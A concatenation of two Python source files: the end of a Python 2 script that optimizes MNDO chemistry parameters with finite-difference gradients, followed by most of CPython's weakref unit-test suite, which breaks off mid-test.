if " NUMBER NUMBER (ANGSTROMS) (ANGSTROMS) (ANGSTROMS" in line:
mode = "atoms"
atoms = np.zeros((20))
return energy * 23.0609
def get_penalty(self, calc):
epsilon = 0.0001
rmsd = 0.0
n = 0
for i in range(len(calc)):
if (abs(calc[i]) > epsilon) and \
(abs(self.reference_energy[i]) > epsilon):
rmsd += (calc[i] - self.reference_energy[i])**2
n += 1
rmsd /= n
return np.sqrt(rmsd)
def optimize(self, values):
self.write_fort14(values)
# self.run_mndo99()
mndo_output = run_mndo99_nodisk()
calc_energies = self.parse_master_precise(mndo_output)
penalty = self.get_penalty(calc_energies)
# print "ENERGY: %12.7f" % (penalty)
return penalty
def jacobian(self, values):
zenergy = self.optimize(values)
print "ENERGY: %12.7f" % (zenergy)
grad = []
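        # Central finite differences: dE/dp_i ~ (E(p_i + h) - E(p_i - h)) / (2h)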
for i, p in enumerate(values):
dparams = deepcopy(values)
dh = 0.000001
dparams[i] += dh
            energy_high = self.optimize(dparams)
            dparams[i] -= (2.0 * dh)
            energy_low = self.optimize(dparams)
            de = energy_high - energy_low
            grad.append(de/(2.0 * dh))
            s = self.names[i]
# print de
print "%3i %8s %15.7f dE/dP = %22.10f" % \
(i+1, s, values[i], de/dh)
grad = np.array(grad)
print "GRADIENT NORM:", norm(grad)
print
print " Numpy formatted values at this point:"
print " values = np.array(["
for v in values:
print "%20.15f," % v
print "])"
print
return grad
if __name__ == "__main__":
from mndo import names
from mndo import values_optimized as values
nv = Parameters(names)
# minimize(nv.optimize, values, jac=nv.jacobian, method="Newton-CG",
# minimize(nv.optimize, values, method="Powell",
minimize(nv.optimize, values, jac=nv.jacobian, method="L-BFGS-B",
options={"maxiter": 1000, "disp": True})
# ydata = pd.DataFrame(dict({ "Calculated" : er,
# "Predicted" : e}))
# rmsd = get_rmsd(er, e)
# print "RMSD = %6.2f kcal/mol" % rmsd
# sns.set(style="whitegrid")
# ax = sns.lmplot(x="Calculated", y="Predicted", data=ydata)
# ax.set(xlim=[-2500, -500], ylim=[-2500,-500])
# ax.set(ylabel='PBE0/def2-TZVP HoF [kcal/mol]', xlabel='DFTB3 + ML-correction HoF [kcal/mol]')
# pyplot.savefig("correlation.png")
|
test_weakref.py
|
import gc
import sys
import unittest
import collections
import weakref
import operator
import contextlib
import copy
import threading
import time
import random
from test import support
from test.support import script_helper, ALWAYS_EQ
# Used in ReferencesTestCase.test_ref_created_during_del() .
ref_from_del = None
# Used by FinalizeTestCase as a global that may be replaced by None
# when the interpreter shuts down.
_global_var = 'foobar'
class C:
def method(self):
pass
class Callable:
bar = None
def __call__(self, x):
self.bar = x
def create_function():
def f(): pass
return f
def create_bound_method():
return C().method
class Object:
def __init__(self, arg):
self.arg = arg
def __repr__(self):
return "<Object %r>" % self.arg
def __eq__(self, other):
if isinstance(other, Object):
return self.arg == other.arg
return NotImplemented
def __lt__(self, other):
if isinstance(other, Object):
return self.arg < other.arg
return NotImplemented
def __hash__(self):
return hash(self.arg)
def some_method(self):
return 4
def other_method(self):
return 5
class RefCycle:
def __init__(self):
self.cycle = self
class TestBase(unittest.TestCase):
def setUp(self):
self.cbcalled = 0
def callback(self, ref):
self.cbcalled += 1
@contextlib.contextmanager
def collect_in_thread(period=0.0001):
"""
Ensure GC collections happen in a different thread, at a high frequency.
"""
please_stop = False
def collect():
while not please_stop:
time.sleep(period)
gc.collect()
with support.disable_gc():
t = threading.Thread(target=collect)
t.start()
try:
yield
finally:
please_stop = True
t.join()
class ReferencesTestCase(TestBase):
def test_basic_ref(self):
self.check_basic_ref(C)
self.check_basic_ref(create_function)
self.check_basic_ref(create_bound_method)
# Just make sure the tp_repr handler doesn't raise an exception.
# Live reference:
o = C()
wr = weakref.ref(o)
repr(wr)
# Dead reference:
del o
repr(wr)
def test_basic_callback(self):
self.check_basic_callback(C)
self.check_basic_callback(create_function)
self.check_basic_callback(create_bound_method)
@support.cpython_only
def test_cfunction(self):
import _testcapi
create_cfunction = _testcapi.create_cfunction
f = create_cfunction()
wr = weakref.ref(f)
self.assertIs(wr(), f)
del f
self.assertIsNone(wr())
self.check_basic_ref(create_cfunction)
self.check_basic_callback(create_cfunction)
def test_multiple_callbacks(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del o
self.assertIsNone(ref1(), "expected reference to be invalidated")
self.assertIsNone(ref2(), "expected reference to be invalidated")
self.assertEqual(self.cbcalled, 2,
"callback not called the right number of times")
def test_multiple_selfref_callbacks(self):
# Make sure all references are invalidated before callbacks are called
#
# What's important here is that we're using the first
# reference in the callback invoked on the second reference
# (the most recently created ref is cleaned up first). This
# tests that all references to the object are invalidated
# before any of the callbacks are invoked, so that we only
# have one invocation of _weakref.c:cleanup_helper() active
# for a particular object at a time.
#
def callback(object, self=self):
self.ref()
c = C()
self.ref = weakref.ref(c, callback)
ref1 = weakref.ref(c, callback)
del c
def test_constructor_kwargs(self):
c = C()
self.assertRaises(TypeError, weakref.ref, c, callback=None)
def test_proxy_ref(self):
o = C()
o.bar = 1
ref1 = weakref.proxy(o, self.callback)
ref2 = weakref.proxy(o, self.callback)
del o
def check(proxy):
proxy.bar
self.assertRaises(ReferenceError, check, ref1)
self.assertRaises(ReferenceError, check, ref2)
self.assertRaises(ReferenceError, bool, weakref.proxy(C()))
self.assertEqual(self.cbcalled, 2)
def check_basic_ref(self, factory):
o = factory()
ref = weakref.ref(o)
self.assertIsNotNone(ref(),
"weak reference to live object should be live")
o2 = ref()
self.assertIs(o, o2,
"<ref>() should return original object if live")
def check_basic_callback(self, factory):
self.cbcalled = 0
o = factory()
ref = weakref.ref(o, self.callback)
del o
self.assertEqual(self.cbcalled, 1,
"callback did not properly set 'cbcalled'")
self.assertIsNone(ref(),
"ref2 should be dead after deleting object reference")
def test_ref_reuse(self):
o = C()
ref1 = weakref.ref(o)
# create a proxy to make sure that there's an intervening creation
# between these two; it should make no difference
proxy = weakref.proxy(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
o = C()
proxy = weakref.proxy(o)
ref1 = weakref.ref(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
self.assertEqual(weakref.getweakrefcount(o), 2,
"wrong weak ref count for object")
del proxy
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong weak ref count for object after deleting proxy")
def test_proxy_reuse(self):
o = C()
proxy1 = weakref.proxy(o)
ref = weakref.ref(o)
proxy2 = weakref.proxy(o)
self.assertIs(proxy1, proxy2,
"proxy object w/out callback should have been re-used")
def test_basic_proxy(self):
o = C()
self.check_proxy(o, weakref.proxy(o))
L = collections.UserList()
p = weakref.proxy(L)
self.assertFalse(p, "proxy for empty UserList should be false")
p.append(12)
self.assertEqual(len(L), 1)
self.assertTrue(p, "proxy for non-empty UserList should be true")
p[:] = [2, 3]
self.assertEqual(len(L), 2)
self.assertEqual(len(p), 2)
self.assertIn(3, p, "proxy didn't support __contains__() properly")
p[1] = 5
self.assertEqual(L[1], 5)
self.assertEqual(p[1], 5)
L2 = collections.UserList(L)
p2 = weakref.proxy(L2)
self.assertEqual(p, p2)
## self.assertEqual(repr(L2), repr(p2))
L3 = collections.UserList(range(10))
p3 = weakref.proxy(L3)
self.assertEqual(L3[:], p3[:])
self.assertEqual(L3[5:], p3[5:])
self.assertEqual(L3[:5], p3[:5])
self.assertEqual(L3[2:5], p3[2:5])
def test_proxy_unicode(self):
# See bug 5037
class C(object):
def __str__(self):
return "string"
def __bytes__(self):
return b"bytes"
instance = C()
self.assertIn("__bytes__", dir(weakref.proxy(instance)))
self.assertEqual(bytes(weakref.proxy(instance)), b"bytes")
def test_proxy_index(self):
class C:
def __index__(self):
return 10
o = C()
p = weakref.proxy(o)
self.assertEqual(operator.index(p), 10)
def test_proxy_div(self):
class C:
def __floordiv__(self, other):
return 42
def __ifloordiv__(self, other):
return 21
o = C()
p = weakref.proxy(o)
self.assertEqual(p // 5, 42)
p //= 5
self.assertEqual(p, 21)
def test_proxy_matmul(self):
class C:
def __matmul__(self, other):
return 1729
def __rmatmul__(self, other):
return -163
def __imatmul__(self, other):
return 561
o = C()
p = weakref.proxy(o)
self.assertEqual(p @ 5, 1729)
self.assertEqual(5 @ p, -163)
p @= 5
self.assertEqual(p, 561)
# The PyWeakref_* C API is documented as allowing either NULL or
# None as the value for the callback, where either means "no
# callback". The "no callback" ref and proxy objects are supposed
# to be shared so long as they exist by all callers so long as
# they are active. In Python 2.3.3 and earlier, this guarantee
# was not honored, and was broken in different ways for
# PyWeakref_NewRef() and PyWeakref_NewProxy(). (Two tests.)
def test_shared_ref_without_callback(self):
self.check_shared_without_callback(weakref.ref)
def test_shared_proxy_without_callback(self):
self.check_shared_without_callback(weakref.proxy)
def check_shared_without_callback(self, makeref):
o = Object(1)
p1 = makeref(o, None)
p2 = makeref(o, None)
self.assertIs(p1, p2, "both callbacks were None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o, None)
self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o)
self.assertIs(p1, p2, "both callbacks were NULL in the C API")
del p1, p2
p1 = makeref(o, None)
p2 = makeref(o)
self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
def test_callable_proxy(self):
o = Callable()
ref1 = weakref.proxy(o)
self.check_proxy(o, ref1)
self.assertIs(type(ref1), weakref.CallableProxyType,
"proxy is not of callable type")
ref1('twinkies!')
self.assertEqual(o.bar, 'twinkies!',
"call through proxy not passed through to original")
ref1(x='Splat.')
self.assertEqual(o.bar, 'Splat.',
"call through proxy not passed through to original")
# expect due to too few args
self.assertRaises(TypeError, ref1)
# expect due to too many args
self.assertRaises(TypeError, ref1, 1, 2, 3)
def check_proxy(self, o, proxy):
o.foo = 1
self.assertEqual(proxy.foo, 1,
"proxy does not reflect attribute addition")
o.foo = 2
self.assertEqual(proxy.foo, 2,
"proxy does not reflect attribute modification")
del o.foo
self.assertFalse(hasattr(proxy, 'foo'),
"proxy does not reflect attribute removal")
proxy.foo = 1
self.assertEqual(o.foo, 1,
"object does not reflect attribute addition via proxy")
proxy.foo = 2
self.assertEqual(o.foo, 2,
"object does not reflect attribute modification via proxy")
del proxy.foo
self.assertFalse(hasattr(o, 'foo'),
"object does not reflect attribute removal via proxy")
def test_proxy_deletion(self):
# Test clearing of SF bug #762891
class Foo:
result = None
def __delitem__(self, accessor):
self.result = accessor
g = Foo()
f = weakref.proxy(g)
del f[0]
self.assertEqual(f.result, 0)
def test_proxy_bool(self):
# Test clearing of SF bug #1170766
class List(list): pass
lyst = List()
self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
def test_proxy_iter(self):
# Test fails with a debug build of the interpreter
# (see bpo-38395).
obj = None
class MyObj:
def __iter__(self):
nonlocal obj
del obj
return NotImplemented
obj = MyObj()
p = weakref.proxy(obj)
with self.assertRaises(TypeError):
# "blech" in p calls MyObj.__iter__ through the proxy,
# without keeping a reference to the real object, so it
# can be killed in the middle of the call
"blech" in p
def test_proxy_reversed(self):
class MyObj:
def __len__(self):
return 3
def __reversed__(self):
return iter('cba')
obj = MyObj()
self.assertEqual("".join(reversed(weakref.proxy(obj))), "cba")
def test_proxy_hash(self):
cool_hash = 299_792_458
class MyObj:
def __hash__(self):
return cool_hash
obj = MyObj()
self.assertEqual(hash(weakref.proxy(obj)), cool_hash)
def test_getweakrefcount(self):
o = C()
ref1 = weakref.ref(o)
ref2 = weakref.ref(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 2,
"got wrong number of weak reference objects")
proxy1 = weakref.proxy(o)
proxy2 = weakref.proxy(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 4,
"got wrong number of weak reference objects")
del ref1, ref2, proxy1, proxy2
self.assertEqual(weakref.getweakrefcount(o), 0,
"weak reference objects not unlinked from"
" referent when discarded.")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefcount(1), 0,
"got wrong number of weak reference objects for int")
def test_getweakrefs(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref1
self.assertEqual(weakref.getweakrefs(o), [ref2],
"list of refs does not match")
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref2
self.assertEqual(weakref.getweakrefs(o), [ref1],
"list of refs does not match")
del ref1
self.assertEqual(weakref.getweakrefs(o), [],
"list of refs not cleared")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefs(1), [],
"list of refs does not match for int")
def test_newstyle_number_ops(self):
class F(float):
pass
f = F(2.0)
p = weakref.proxy(f)
self.assertEqual(p + 1.0, 3.0)
self.assertEqual(1.0 + p, 3.0) # this used to SEGV
def test_callbacks_protected(self):
# Callbacks protected from already-set exceptions?
# Regression test for SF bug #478534.
class BogusError(Exception):
pass
data = {}
def remove(k):
del data[k]
def encapsulate():
f = lambda : ()
data[weakref.ref(f, remove)] = None
raise BogusError
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
def test_sf_bug_840829(self):
# "weakref callbacks and gc corrupt memory"
# subtype_dealloc erroneously exposed a new-style instance
# already in the process of getting deallocated to gc,
# causing double-deallocation if the instance had a weakref
# callback that triggered gc.
# If the bug exists, there probably won't be an obvious symptom
# in a release build. In a debug build, a segfault will occur
# when the second attempt to remove the instance from the "list
# of all objects" occurs.
import gc
class C(object):
pass
c = C()
wr = weakref.ref(c, lambda ignore: gc.collect())
del c
# There endeth the first part. It gets worse.
del wr
c1 = C()
c1.i = C()
wr = weakref.ref(c1.i, lambda ignore: gc.collect())
c2 = C()
c2.c1 = c1
del c1 # still alive because c2 points to it
# Now when subtype_dealloc gets called on c2, it's not enough just
# that c2 is immune from gc while the weakref callbacks associated
# with c2 execute (there are none in this 2nd half of the test, btw).
# subtype_dealloc goes on to call the base classes' deallocs too,
# so any gc triggered by weakref callbacks associated with anything
# torn down by a base class dealloc can also trigger double
# deallocation of c2.
del c2
def test_callback_in_cycle_1(self):
import gc
class J(object):
pass
class II(object):
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
# Now J and II are each in a self-cycle (as all new-style class
# objects are, since their __mro__ points back to them). I holds
# both a weak reference (I.wr) and a strong reference (I.J) to class
# J. I is also in a cycle (I.wr points to a weakref that references
# I.acallback). When we del these three, they all become trash, but
# the cycles prevent any of them from getting cleaned up immediately.
# Instead they have to wait for cyclic gc to deduce that they're
# trash.
#
# gc used to call tp_clear on all of them, and the order in which
# it does that is pretty accidental. The exact order in which we
# built up these things manages to provoke gc into running tp_clear
# in just the right order (I last). Calling tp_clear on II leaves
# behind an insane class object (its __mro__ becomes NULL). Calling
# tp_clear on J breaks its self-cycle, but J doesn't get deleted
# just then because of the strong reference from I.J. Calling
# tp_clear on I starts to clear I's __dict__, and just happens to
# clear I.J first -- I.wr is still intact. That removes the last
# reference to J, which triggers the weakref callback. The callback
# tries to do "self.J", and instances of new-style classes look up
# attributes ("J") in the class dict first. The class (II) wants to
# search II.__mro__, but that's NULL. The result was a segfault in
# a release build, and an assert failure in a debug build.
del I, J, II
gc.collect()
def test_callback_in_cycle_2(self):
import gc
# This is just like test_callback_in_cycle_1, except that II is an
# old-style class. The symptom is different then: an instance of an
# old-style class looks in its own __dict__ first. 'J' happens to
# get cleared from I.__dict__ before 'wr', and 'J' was never in II's
# __dict__, so the attribute isn't found. The difference is that
# the old-style II doesn't have a NULL __mro__ (it doesn't have any
# __mro__), so no segfault occurs. Instead it got:
# test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
# Exception exceptions.AttributeError:
# "II instance has no attribute 'J'" in <bound method II.acallback
# of <?.II instance at 0x00B9B4B8>> ignored
class J(object):
pass
class II:
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
del I, J, II
gc.collect()
def test_callback_in_cycle_3(self):
import gc
# This one broke the first patch that fixed the last two. In this
# case, the objects reachable from the callback aren't also reachable
# from the object (c1) *triggering* the callback: you can get to
# c1 from c2, but not vice-versa. The result was that c2's __dict__
# got tp_clear'ed by the time the c2.cb callback got invoked.
class C:
def cb(self, ignore):
self.me
self.c1
self.wr
c1, c2 = C(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2
gc.collect()
def test_callback_in_cycle_4(self):
import gc
# Like test_callback_in_cycle_3, except c2 and c1 have different
# classes. c2's class (C) isn't reachable from c1 then, so protecting
# objects reachable from the dying object (c1) isn't enough to stop
# c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
# The result was a segfault (C.__mro__ was NULL when the callback
# tried to look up self.me).
class C(object):
def cb(self, ignore):
self.me
self.c1
self.wr
class D:
pass
c1, c2 = D(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2, C, D
gc.collect()
def test_callback_in_cycle_resurrection(self):
import gc
# Do something nasty in a weakref callback: resurrect objects
# from dead cycles. For this to be attempted, the weakref and
# its callback must also be part of the cyclic trash (else the
# objects reachable via the callback couldn't be in cyclic trash
# to begin with -- the callback would act like an external root).
# But gc clears trash weakrefs with callbacks early now, which
# disables the callbacks, so the callbacks shouldn't get called
# at all (and so nothing actually gets resurrected).
alist = []
class C(object):
def __init__(self, value):
self.attribute = value
def acallback(self, ignore):
alist.append(self.c)
c1, c2 = C(1), C(2)
c1.c = c2
c2.c = c1
c1.wr = weakref.ref(c2, c1.acallback)
c2.wr = weakref.ref(c1, c2.acallback)
def C_went_away(ignore):
alist.append("C went away")
wr = weakref.ref(C, C_went_away)
del c1, c2, C # make them all trash
self.assertEqual(alist, []) # del isn't enough to reclaim anything
gc.collect()
# c1.wr and c2.wr were part of the cyclic trash, so should have
# been cleared without their callbacks executing. OTOH, the weakref
# to C is bound to a function local (wr), and wasn't trash, so that
# callback should have been invoked when C went away.
self.assertEqual(alist, ["C went away"])
# The remaining weakref should be dead now (its callback ran).
self.assertEqual(wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_callbacks_on_callback(self):
import gc
# Set up weakref callbacks *on* weakref callbacks.
alist = []
def safe_callback(ignore):
alist.append("safe_callback called")
class C(object):
def cb(self, ignore):
alist.append("cb called")
c, d = C(), C()
c.other = d
d.other = c
callback = c.cb
c.wr = weakref.ref(d, callback) # this won't trigger
d.wr = weakref.ref(callback, d.cb) # ditto
external_wr = weakref.ref(callback, safe_callback) # but this will
self.assertIs(external_wr(), callback)
# The weakrefs attached to c and d should get cleared, so that
# C.cb is never called. But external_wr isn't part of the cyclic
# trash, and no cyclic trash is reachable from it, so safe_callback
# should get invoked when the bound method object callback (c.cb)
# -- which is itself a callback, and also part of the cyclic trash --
# gets reclaimed at the end of gc.
del callback, c, d, C
self.assertEqual(alist, []) # del isn't enough to clean up cycles
gc.collect()
self.assertEqual(alist, ["safe_callback called"])
self.assertEqual(external_wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_gc_during_ref_creation(self):
self.check_gc_during_creation(weakref.ref)
def test_gc_during_proxy_creation(self):
self.check_gc_during_creation(weakref.proxy)
def check_gc_during_creation(self, makeref):
thresholds = gc.get_threshold()
gc.set_threshold(1, 1, 1)
gc.collect()
class A:
pass
def callback(*args):
pass
referenced = A()
a = A()
a.a = a
a.wr = makeref(referenced)
try:
# now make sure the object and the ref get labeled as
# cyclic trash:
a = A()
weakref.ref(referenced, callback)
finally:
gc.set_threshold(*thresholds)
def test_ref_created_during_del(self):
# Bug #1377858
# A weakref created in an object's __del__() would crash the
# interpreter when the weakref was cleaned up since it would refer to
# non-existent memory. This test should not segfault the interpreter.
class Target(object):
def __del__(self):
global ref_from_del
ref_from_del = weakref.ref(self)
w = Target()
def test_init(self):
# Issue 3634
# <weakref to class>.__init__() doesn't check errors correctly
r = weakref.ref(Exception)
self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
# No exception should be raised here
gc.collect()
def test_classes(self):
# Check that classes are weakrefable.
class A(object):
pass
l = []
weakref.ref(int)
a = weakref.ref(A, l.append)
A = None
gc.collect()
self.assertEqual(a(), None)
self.assertEqual(l, [a])
def test_equality(self):
# Alive weakrefs defer equality testing to their underlying object.
x = Object(1)
y = Object(1)
z = Object(2)
a = weakref.ref(x)
b = weakref.ref(y)
c = weakref.ref(z)
d = weakref.ref(x)
# Note how we directly test the operators here, to stress both
# __eq__ and __ne__.
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertTrue(a == d)
self.assertFalse(a != d)
self.assertFalse(a == x)
self.assertTrue(a != x)
self.assertTrue(a == ALWAYS_EQ)
self.assertFalse(a != ALWAYS_EQ)
del x, y, z
gc.collect()
for r in a, b, c:
# Sanity check
self.assertIs(r(), None)
# Dead weakrefs compare by identity: whether `a` and `d` are the
# same weakref object is an implementation detail, since they pointed
# to the same original object and didn't have a callback.
# (see issue #16453).
self.assertFalse(a == b)
self.assertTrue(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertEqual(a == d, a is d)
self.assertEqual(a != d, a is not d)
def test_ordering(self):
# weakrefs cannot be ordered, even if the underlying objects can.
ops = [operator.lt, operator.gt, operator.le, operator.ge]
x = Object(1)
y = Object(1)
a = weakref.ref(x)
b = weakref.ref(y)
for op in ops:
self.assertRaises(TypeError, op, a, b)
# Same when dead.
del x, y
gc.collect()
for op in ops:
self.assertRaises(TypeError, op, a, b)
def test_hashing(self):
# Alive weakrefs hash the same as the underlying object
x = Object(42)
y = Object(42)
a = weakref.ref(x)
b = weakref.ref(y)
self.assertEqual(hash(a), hash(42))
del x, y
gc.collect()
# Dead weakrefs:
        # - retain their hash if they were hashed when alive;
# - otherwise, cannot be hashed.
self.assertEqual(hash(a), hash(42))
self.assertRaises(TypeError, hash, b)
def test_trashcan_16602(self):
# Issue #16602: when a weakref's target was part of a long
# deallocation chain, the trashcan mechanism could delay clearing
# of the weakref and make the target object visible from outside
# code even though its refcount had dropped to 0. A crash ensued.
class C:
def __init__(self, parent):
if not parent:
return
wself = weakref.ref(self)
def cb(wparent):
o = wself()
self.wparent = weakref.ref(parent, cb)
d = weakref.WeakKeyDictionary()
root = c = C(None)
for n in range(100):
d[c] = c = C(c)
del root
gc.collect()
def test_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
self.assertIs(ref1.__callback__, callback)
ref2 = weakref.ref(x)
self.assertIsNone(ref2.__callback__)
def test_callback_attribute_after_deletion(self):
x = Object(1)
ref = weakref.ref(x, self.callback)
self.assertIsNotNone(ref.__callback__)
del x
support.gc_collect()
self.assertIsNone(ref.__callback__)
def test_set_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
with self.assertRaises(AttributeError):
ref1.__callback__ = lambda ref: None
def test_callback_gcs(self):
class ObjectWithDel(Object):
def __del__(self): pass
x = ObjectWithDel(1)
ref1 = weakref.ref(x, lambda ref: support.gc_collect())
del x
support.gc_collect()
class SubclassableWeakrefTestCase(TestBase):
def test_subclass_refs(self):
class MyRef(weakref.ref):
def __init__(self, ob, callback=None, value=42):
self.value = value
super().__init__(ob, callback)
def __call__(self):
self.called = True
return super().__call__()
o = Object("foo")
mr = MyRef(o, value=24)
self.assertIs(mr(), o)
self.assertTrue(mr.called)
self.assertEqual(mr.value, 24)
del o
self.assertIsNone(mr())
self.assertTrue(mr.called)
def test_subclass_refs_dont_replace_standard_refs(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o)
r2 = weakref.ref(o)
self.assertIsNot(r1, r2)
self.assertEqual(weakref.getweakrefs(o), [r2, r1])
self.assertEqual(weakref.getweakrefcount(o), 2)
r3 = MyRef(o)
self.assertEqual(weakref.getweakrefcount(o), 3)
refs = weakref.getweakrefs(o)
self.assertEqual(len(refs), 3)
self.assertIs(r2, refs[0])
self.assertIn(r1, refs[1:])
self.assertIn(r3, refs[1:])
def test_subclass_refs_dont_conflate_callbacks(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o, id)
r2 = MyRef(o, str)
self.assertIsNot(r1, r2)
refs = weakref.getweakrefs(o)
self.assertIn(r1, refs)
self.assertIn(r2, refs)
def test_subclass_refs_with_slots(self):
class MyRef(weakref.ref):
__slots__ = "slot1", "slot2"
def __new__(type, ob, callback, slot1, slot2):
return weakref.ref.__new__(type, ob, callback)
def __init__(self, ob, callback, slot1, slot2):
self.slot1 = slot1
self.slot2 = slot2
def meth(self):
return self.slot1 + self.slot2
o = Object(42)
r = MyRef(o, None, "abc", "def")
self.assertEqual(r.slot1, "abc")
self.assertEqual(r.slot2, "def")
self.assertEqual(r.meth(), "abcdef")
self.assertFalse(hasattr(r, "__dict__"))
def test_subclass_refs_with_cycle(self):
"""Confirm https://bugs.python.org/issue3100 is fixed."""
# An instance of a weakref subclass can have attributes.
# If such a weakref holds the only strong reference to the object,
# deleting the weakref will delete the object. In this case,
# the callback must not be called, because the ref object is
# being deleted.
class MyRef(weakref.ref):
pass
# Use a local callback, for "regrtest -R::"
# to detect refcounting problems
def callback(w):
self.cbcalled += 1
o = C()
r1 = MyRef(o, callback)
r1.o = o
del o
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
# Same test, with two weakrefs to the same object
# (since code paths are different)
o = C()
r1 = MyRef(o, callback)
r2 = MyRef(o, callback)
r1.r = r2
r2.o = o
del o
del r2
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
class WeakMethodTestCase(unittest.TestCase):
def _subclass(self):
"""Return an Object subclass overriding `some_method`."""
class C(Object):
def some_method(self):
return 6
return C
def test_alive(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
self.assertIsInstance(r, weakref.ReferenceType)
self.assertIsInstance(r(), type(o.some_method))
self.assertIs(r().__self__, o)
self.assertIs(r().__func__, o.some_method.__func__)
self.assertEqual(r()(), 4)
def test_object_dead(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
del o
gc.collect()
self.assertIs(r(), None)
def test_method_dead(self):
C = self._subclass()
o = C(1)
r = weakref.WeakMethod(o.some_method)
del C.some_method
gc.collect()
self.assertIs(r(), None)
def test_callback_when_object_dead(self):
# Test callback behaviour when object dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del o
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
C.some_method = Object.some_method
gc.collect()
self.assertEqual(calls, [r])
def test_callback_when_method_dead(self):
# Test callback behaviour when method dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del C.some_method
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
del o
gc.collect()
self.assertEqual(calls, [r])
@support.cpython_only
def test_no_cycles(self):
# A WeakMethod doesn't create any reference cycle to itself.
o = Object(1)
def cb(_):
pass
r = weakref.WeakMethod(o.some_method, cb)
wr = weakref.ref(r)
del r
self.assertIs(wr(), None)
def test_equality(self):
def _eq(a, b):
self.assertTrue(a == b)
self.assertFalse(a != b)
def _ne(a, b):
self.assertTrue(a != b)
self.assertFalse(a == b)
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(x.other_method)
d = weakref.WeakMethod(y.other_method)
# Objects equal, same method
_eq(a, b)
_eq(c, d)
# Objects equal, different method
_ne(a, c)
_ne(a, d)
_ne(b, c)
_ne(b, d)
# Objects unequal, same or different method
z = Object(2)
e = weakref.WeakMethod(z.some_method)
f = weakref.WeakMethod(z.other_method)
_ne(a, e)
_ne(a, f)
_ne(b, e)
_ne(b, f)
# Compare with different types
_ne(a, x.some_method)
_eq(a, ALWAYS_EQ)
del x, y, z
gc.collect()
# Dead WeakMethods compare by identity
refs = a, b, c, d, e, f
for q in refs:
for r in refs:
self.assertEqual(q == r, q is r)
self.assertEqual(q != r, q is not r)
def test_hashing(self):
# Alive WeakMethods are hashable if the underlying object is
# hashable.
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(y.other_method)
# Since WeakMethod objects are equal, the hashes should be equal.
self.assertEqual(hash(a), hash(b))
ha = hash(a)
# Dead WeakMethods retain their old hash value
del x, y
gc.collect()
self.assertEqual(hash(a), ha)
self.assertEqual(hash(b), ha)
# If it wasn't hashed when alive, a dead WeakMethod cannot be hashed.
self.assertRaises(TypeError, hash, c)
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
# Keep an iterator alive
it = dct.items()
try:
next(it)
except StopIteration:
pass
del items
gc.collect()
n1 = len(dct)
del it
gc.collect()
n2 = len(dct)
# one item may be kept alive inside the iterator
self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda k: (1, k))
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.items()
try:
next(it)
